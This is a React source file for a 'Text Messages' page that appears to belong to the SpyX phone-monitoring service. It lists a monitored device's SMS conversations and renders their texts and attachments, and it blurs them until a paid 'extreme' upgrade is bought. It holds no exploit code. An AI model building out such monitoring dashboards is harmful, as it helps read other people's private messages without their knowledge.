// ** React Imports
import { Fragment, useCallback, useEffect, useRef, useState } from 'react'
import { useExtremeUpgradeRefresh } from 'src/hooks/useExtremeUpgradeRefresh'

import Grid from '@mui/material/Grid'
import { useTranslation } from 'src/utils/i18n'

// ** MUI Imports
import ListItem from '@mui/material/ListItem'
import Typography from '@mui/material/Typography'

// ** Store & Actions Imports
import { useDispatch, useSelector } from 'react-redux'
import {
  selectMessage,
  fetchUserProfile,
  removeSelectedChat,
  setMessageDateRange
} from 'src/store/apps/text-messages'

// ** Antdesign Imports
import { DatePicker } from 'antd'

import Image from 'next/image'
import { openInNewTab } from 'src/utils/navigate'

// import { setCurrentTab } from 'src/store/apps/Common'
import dayjs from 'dayjs'
import styles from 'styles/video.module.scss'
import { setCurrentTab, changeExtremeService } from 'src/store/apps/Common'
import NoData from 'src/components/NoData'
import RangePickerBox from 'src/components/RangePickerBox'
import ExtremeUpgradeModal from 'src/@core/components/modal/extreme-upgrade'
import ContentLoading from 'src/components/ContentLoading'
import { buildTimeParams, toMillis } from 'src/utils/dateRangeParams'
import { useExtremeFeatureAccessGate } from 'src/hooks/useExtremeFeatureAccessGate'

// 附件资源域名（与 src/@core/components/text-messages/messages-log.js 保持一致）
const fileBaseUrl = 'https://cos.spyx.com/'

//判断聊天内容的类型
const content = (item, t) => {
  try {
    if (typeof item.attachment === 'undefined' || item.attachment === null) {
      return <>{item.text}</>
    } else if (
      item.attachment.mimeType === 'video/quicktime' ||
      item.attachment.mimeType === 'video/mp4' ||
      item.attachment.mimeType === 'video/webm' ||
      item.attachment.mimeType === 'video/mpeg'
    ) {
      return (
        <div className={styles.videoContainer}>
          <video
            className={styles.video}
            controls={true}
            autoPlay={false}
            id='video'
            preload='none'
            loop={false}
            muted={false}
          >
            {t('can not be used Video')}
            <source src={`https://cos.spyx.com/${item.attachment.url}`} type='video/mp4' />
          </video>
        </div>
      )
    } else if (
      item.attachment.mimeType === 'application/pdf' ||
      item.attachment.mimeType === 'application/msword' ||
      item.attachment.mimeType === 'application/json' ||
      item.attachment.mimeType === 'application/xml' ||
      item.attachment.mimeType === 'application/zip' ||
      item.attachment.mimeType === 'application/octet-stream'
    ) {
      return (
        <Image
          src={`/images/files/${item.attachment.mimeType.split('/')[2] === 'pdf'
            ? 'pdf'
            : item.attachment.mimeType.split('/')[2] === 'zip'
              ? 'zip'
              : 'empty'
            }.png`}
          onClick={() => openInNewTab(`${fileBaseUrl}${item.attachment.url}`)}
          width={80}
          height={80}
          alt={'file'}
        />
      )
    } else if (
      item.attachment.mimeType === 'image/jpeg' ||
      item.attachment.mimeType === 'image/png' ||
      item.attachment.mimeType === 'image/gif'
    ) {
      return <Image src={`https://cos.spyx.com/${item.attachment.url}`} alt='img' width='150' height='150' />
    }
  } catch (error) {
    console.log(error)
  }
}

const TextMessages = () => {
  let Advanced = window.localStorage.getItem('Advanced')
  Advanced = Advanced == null || Advanced == 0 ? true : false

  // 当前页面
  const [currentPage, setCurrentPage] = useState(1)

  // 消息列表
  const [messageList, setMessageList] = useState([])

  //筛选过的消息列表
  const [dateMessageList, setDateMessageList] = useState([])

  const [advanced, setAdvanced] = useState(true) // 是否购买高级服务
  const [scroll, setScroll] = useState(0) // 滚动百分比

  const messageListDom = useRef(null)
  const messageContentDom = useRef(null)

  // ** Hooks
  const dispatch = useDispatch()

  const store = useSelector(state => state.TextMessages)

  const storeCommon = useSelector(state => state.Common)

  const { RangePicker } = DatePicker
  const func1 = useRef()
  const func2 = useRef()
  const [messageIndex, setMessageIndex] = useState(0)
  const [isLoading, setIsLoading] = useState(true) //正在加载获取数据

  const { t, locale } = useTranslation('common')

  useEffect(() => {
    const title = t('Text message')
    dispatch(setCurrentTab(title))

    return () => dispatch(setCurrentTab(''))
  }, [dispatch, locale])


  useEffect(() => {
    dispatch(fetchUserProfile())
  }, [dispatch])

  // 升级成功后：预缓冲已在 notify 完成，这里重拉详情读 advanced
  useExtremeUpgradeRefresh(
    useCallback(() => {
      setAdvanced(true)
      dispatch(fetchUserProfile())
    }, [dispatch])
  )

  useEffect(() => {
    setMessageList([...store.list])
    setDateMessageList([...store.list])
    setIsLoading(false)

    // 设置高级服务状态
    const advanced = store.advanced === true || store.advanced === 'true'
    setAdvanced(advanced)
    dispatch(changeExtremeService(advanced)) // 更新高级服务状态
  }, [store.list])

  // 监听列表滚动进度
  useEffect(() => {
    if (!messageListDom.current) return
    if (currentPage !== 1) return

    const dom = messageListDom.current
    if (func1.current) {
      dom.removeEventListener('scroll', func1.current)
    }

    func1.current = () => {
      const clientHeight = dom.clientHeight
      const scrollTop = dom.scrollTop
      const scrollHeight = dom.scrollHeight
      const process = (scrollTop / (scrollHeight - clientHeight)) * 100
      if (process >= 75) setScroll(process.toFixed(0))
    }
    dom.addEventListener('scroll', func1.current)

    return () => {
      dom.removeEventListener('scroll', func1.current)
    }
  }, [currentPage, dispatch])

  // 滚动到100%时获取新数据
  useEffect(() => {
    if (scroll >= 100 && advanced) dispatch(fetchUserProfile())
  }, [scroll])

  // 短信内容滚动到底部
  useEffect(() => {
    if (!messageContentDom.current) return
    if (currentPage !== 2) return

    const dom = messageContentDom.current
    if (func2.current) {
      dom.removeEventListener('scroll', func2.current)
    }

    func2.current = () => {
      const clientHeight = dom.clientHeight
      const scrollTop = dom.scrollTop
      const scrollHeight = dom.scrollHeight
      if (clientHeight + scrollTop === scrollHeight) {
        dispatch(selectMessage())
      }
    }
    dom.addEventListener('scroll', func2.current)

    return () => {
      dom.removeEventListener('scroll', func2.current)
    }
  }, [currentPage, dispatch])

  const onClickMessage = (guid, item, index) => {
    setMessageIndex(index)

    if (advanced) { // 开通高级服务
      if (JSON.parse(localStorage.getItem('smsItem')).guid === guid) {
        setCurrentPage(2)
      } else {
        dispatch(selectMessage(item))
        localStorage.setItem('smsItem', JSON.stringify(item))
        setCurrentPage(2)
      }
    }
  }

  const [selectedDates, setSelectedDates] = useState(null)

  const [antdSelectedDates, setAntdSelectedDates] = useState([])
  const [selectedDateIndex, setSelectedDateIndex] = useState()

  //选择日期范围
  const handleDateChange = dates => {
    const picked = dates && dates.length === 2 ? dates : []

    setAntdSelectedDates(picked)
    setSelectedDateIndex(picked.length === 2 ? 2 : 1)

    if (!advanced) {
      // 未开通高级：列表是本地模拟数据，直接本地筛
      const { startTime, endTime } = buildTimeParams(picked)
      const base = [...store.list]
      const filtered =
        picked.length === 2
          ? base.filter(item => {
              const itemTime = toMillis(item.snippetTimestamp ?? item.time)

              return itemTime >= startTime && itemTime <= endTime
            })
          : base

      setMessageList(filtered)
      setDateMessageList(filtered)

      return
    }

    // 已开通高级：把区间交给 store，由接口按日期重新取数（列表会随 store.list 自动刷新）
    dispatch(setMessageDateRange(picked))
    dispatch(fetchUserProfile())
  }

  const fetchLoading = [true, 'true'].includes(store.fetchLoading) // 数据获取中
  const basicNotOver = [null, ''].includes(storeCommon.resetTime.basicUpdateDownloadTime) // 是否未完成一步验证
  const advancedNotOver = [null, ''].includes(storeCommon.resetTime.advancedUpdateDownloadTime) // 高级数据未下载完成（空 = 未完成）
  // 高级功能门控（对齐 SpyX）：未绑高级 → 跳 /ios/extreme-verification；数据未就绪 → loading；已绑未购 → 升级提示
  const { gatePending, showUpgradeModal } = useExtremeFeatureAccessGate(advanced)
  const [justVerified, setJustVerified] = useState(false) // 是否为刚完成验证

  return (
    <>
      <div className='Bxl:h-[calc(var(--vh2)*100-94px)] Bxls:Headers5:h-[calc(var(--vh2)*100-149px)] Header5:big:h-[calc(var(--vh2)*100-214px)] bigs:h-[calc(var(--vh2)*100-274px)]'>
        <Grid
          item
          container
          spacing={0}
          sx={{ background: 'white', borderRadius: '10px' }}
          style={{ boxShadow: '0px 0px 12px 0px #00000021' }}
          className='h-full relative'
        >
          {fetchLoading || gatePending ? (
            <ContentLoading />
          ) : (
            <>
              {/* 高级服务开通提示：已绑高级但未购买；未绑高级由 useExtremeFeatureAccessGate 跳转独立验证页 */}
              {showUpgradeModal && <ExtremeUpgradeModal open />}
            </>
          )}

          {/* 左侧列表 */}

          <div
            className={`px-[15px] h-full ${advanced ? 'overflow-auto' : 'overflow-hidden'} w-[345px] sm:w-full border-r-[1px] border-[rgb(229, 231, 235)]  ${currentPage !== 1 ? 'sm:hidden' : 'block'
              } ${!advanced ? 'blur-[16px] select-none' : ''}`}
            ref={messageListDom}
          >
            {/*时间选择器*/}
            {messageList && (
              <div className='mt-[20px] mb-[10px]'>
                <RangePickerBox
                  value={antdSelectedDates}
                  onChange={handleDateChange}
                  onClear={() => {
                    setAntdSelectedDates([])
                    handleDateChange([])
                  }}
                />
              </div>
            )}

            {store.list && store.list.length > 0 ? (
              <>
                {messageList.map((item, i) => (
                  <div
                    className={`w-full h-[56px] py-[10px] flex items-center px-2 border-b hover:cursor-pointer border-[#E5E7EB] ${messageIndex === i ? 'bg-[#e9e9eb] rounded-[10px]' : ''
                      }`}
                    key={i}
                    onClick={() => onClickMessage(item.guid, item, i)}
                  >
                    <div className='flex flex-1'>
                      <Image
                        src={item.avatar ? item.avatar : '/images/text-messages/avatar.svg'}
                        width={36}
                        height={36}
                        alt='avatar'
                        className='mr-[17px]'
                      ></Image>
                      <div className='flex flex-col justify-center flex-1 w-0'>
                        <div className='flex justify-between items-center flex-1'>
                          <span className='text-[#000] text-[14px] font-[600] overflow-hidden text-ellipsis whitespace-nowrap'>{item.chatid}</span>
                          <span className='text-[#808080] text-[10px] text-nowrap'>
                            {/* 今天 */}
                            {new Date(item.snippetTimestamp).toDateString() === new Date().toDateString() && (
                              <>{dayjs(item.snippetTimestamp).format('hh:mmA')} &gt;</>
                            )}
                            {/* 不是今天 */}
                            {new Date(item.snippetTimestamp).toDateString() !== new Date().toDateString() && (
                              <>{dayjs(item.snippetTimestamp).format('YYYY/MM/DD')} &gt;</>
                            )}
                          </span>
                        </div>

                        <span className='text-[#808080] text-[12px] overflow-hidden text-ellipsis whitespace-nowrap flex-1'>
                          {item.snippet}
                        </span>
                      </div>
                    </div>
                  </div>
                ))}
              </>
            ) : (
              <ListItem>
                <Typography sx={{ color: 'text.secondary' }}>
                  {store.fetchLoading || <div className='text-center mt-[70%]'>
                    {t('It appears theres no data to show here yet')}<br />
                    {t('If data exists it may take up to 1 hour to download and appear')}<br />
                    {t('We suggest checking back in a little while')}
                  </div>}
                </Typography>
              </ListItem>
            )}
          </div>

          <div className={`w-full flex-1 ${currentPage === 2 ? 'block' : 'sm:hidden'} ${!advanced ? 'blur-[16px] select-none' : ''}`}>
            {/* 消息框 */}
            {store.selectedMessage ? (
              <>
                <div className='w-full h-[80px] bg-[#F5F5F5] flex justify-between px-[14px] border-b border-[#DADADA]  rounded-tr-[10px] sm:rounded-tl-[10px]'>
                  <Image
                    className='md:invisible'
                    src='/images/text-messages/return.svg'
                    width={20}
                    height={20}
                    alt='return'
                    onClick={() => setCurrentPage(1)}
                  ></Image>
                  <div className='flex flex-col justify-end items-center'>
                    <Image src='/images/text-messages/avatar.svg' width={44} height={44} alt='alt'></Image>
                    <span className='text-[10px] text-[#000] my-[3px]'>{store.selectedMessage.contact.chatid}</span>
                  </div>
                  <div className='w-[20px] h-[20px]'></div>
                </div>
                <main
                  className={`flex flex-col ${advanced ? 'overflow-auto' : 'overflow-hidden'} px-[14px] pb-[12px] Bxl:h-[calc(var(--vh2)*100-174px)] Bxls:Headers5:h-[calc(var(--vh2)*100-229px)] Header5:big:h-[calc(var(--vh2)*100-294px)] bigs:h-[calc(var(--vh2)*100-354px)] w-full`}
                  ref={messageContentDom}
                >
                  {store.selectedMessage.selected.map((item, i) => (
                    <Fragment key={i}>
                      {!item.isFromMe && (
                        <div className='w-full flex flex-col mt-[12px] items-start'>
                          <div className='w-full text-[12px] text-[#808080] text-center'>{item.time}</div>
                          <div className='max-w-[80%] py-[8px] px-[10px] bg-[#E9E9EB] rounded-[10px] text-[12px] text-[#000] mt-[2px] break-words'>
                            {content(item, t)}
                          </div>
                        </div>
                      )}
                      {item.isFromMe && (
                        <div className='w-full flex flex-col mt-[12px] items-end'>
                          <div className='w-full text-[12px] text-[#808080] text-center'>{item.time}</div>
                          <div className='max-w-[80%] py-[8px] px-[10px] bg-[#57C860] rounded-[10px] text-[12px] text-[#FFFFFF] mt-[2px]'>
                            {content(item, t)}
                          </div>
                        </div>
                      )}
                    </Fragment>
                  ))}
                </main>
              </>
            ) : (
              <NoData />
            )}
          </div>
        </Grid>
      </div>
    </>
  )
}

// TextMessages.contentHeightFixed = true

export default TextMessages


